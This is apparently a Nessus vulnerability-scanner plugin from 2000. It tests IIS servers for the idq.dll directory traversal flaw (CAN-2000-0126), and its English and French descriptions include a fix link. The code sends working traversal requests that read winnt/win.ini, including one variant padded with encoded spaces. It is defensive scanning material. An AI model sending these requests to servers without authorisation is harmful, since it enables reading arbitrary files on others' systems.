#
# This script was written by Renaud Deraison <deraison@cvs.nessus.org>
#
# See the Nessus Scripts License for details
#

if(description)
{
 script_id(10115);
 script_cve_id("CAN-2000-0126");
 name["english"] = "idq.dll directory traversal";
 name["francais"] = "idq.dll directory traversal";
 script_name(english:name["english"], francais:name["francais"]);
 
 desc["english"] = "
There is a vulnerability in idq.dll which allows any remote
user to read any file on the target sytem by doing the request :

	GET http://target/query.idq?CiTemplate=../../../somefile.ext
	

Solution : Microsoft's webhits.dll addresses some of this
           issue. It is available at :
	   http://www.microsoft.com/downloads/release/asp?ReleaseID=17727

Risk factor : High
Bugtraq ID : 968";

 desc["francais"] = "
Il existe une vulnrabilit dans idq.dll qui permet  n'importe quel
utilisateur de lire n'importe quel fichier  sur le site distant en
faisant la requete :

	GET http://target/query.idq?CiTemplate=../../../somefile.ext

Solution : webhits.dll, de Microsoft, corrige ce problme. Il est
           disponible  :
	   http://www.microsoft.com/downloads/release/asp?ReleaseID=17727

Facteur de risque : Elev
Bugtraq ID : 968";

 script_description(english:desc["english"], francais:desc["francais"]);
 
 summary["english"] = "Attempts to read an arbitrary file";
 summary["francais"] = "Essaye de lire un fichier arbitraire";
 
 script_summary(english:summary["english"], francais:summary["francais"]);
 
 script_category(ACT_GATHER_INFO);
 
 
 script_copyright(english:"This script is Copyright (C) 2000 Renaud Deraison",
		francais:"Ce script est Copyright (C) 2000 Renaud Deraison");
 family["english"] = "CGI abuses";
 family["francais"] = "Abus de CGI";
 script_family(english:family["english"], francais:family["francais"]);
 script_dependencie("find_service.nes");
 script_require_ports("Services/www", 80);
 exit(0);
}

#
# The script code starts here
#

base = "GET /query.idq?CiTemplate=../../../../../winnt/win.ini";
req1 = string(base, " HTTP/1.0\r\n\r\n");
req2 = string(base, crap(data:"%20", length:300), " HTTP/1.0\r\n\r\n");

port = get_kb_item("Services/www");
if(!port)port = 80;
if(get_port_state(port))
{
 soc = open_sock_tcp(port);
 if(soc)
 {
  send(socket:soc, data:req1);
  r = recv(socket:soc, length:2048);
  close(soc);
  if("[fonts]" >< r)
  {
   security_hole(port);
   exit(0);
  }
  soc2 = open_sock_tcp(port);
  send(socket:soc2, data:req2);
  r2 = recv(socket:soc2, length:2048);
  close(soc2);
  if("[fonts]" >< r2)
  {
   security_hole(port);
   exit(0);
  }
 }
}
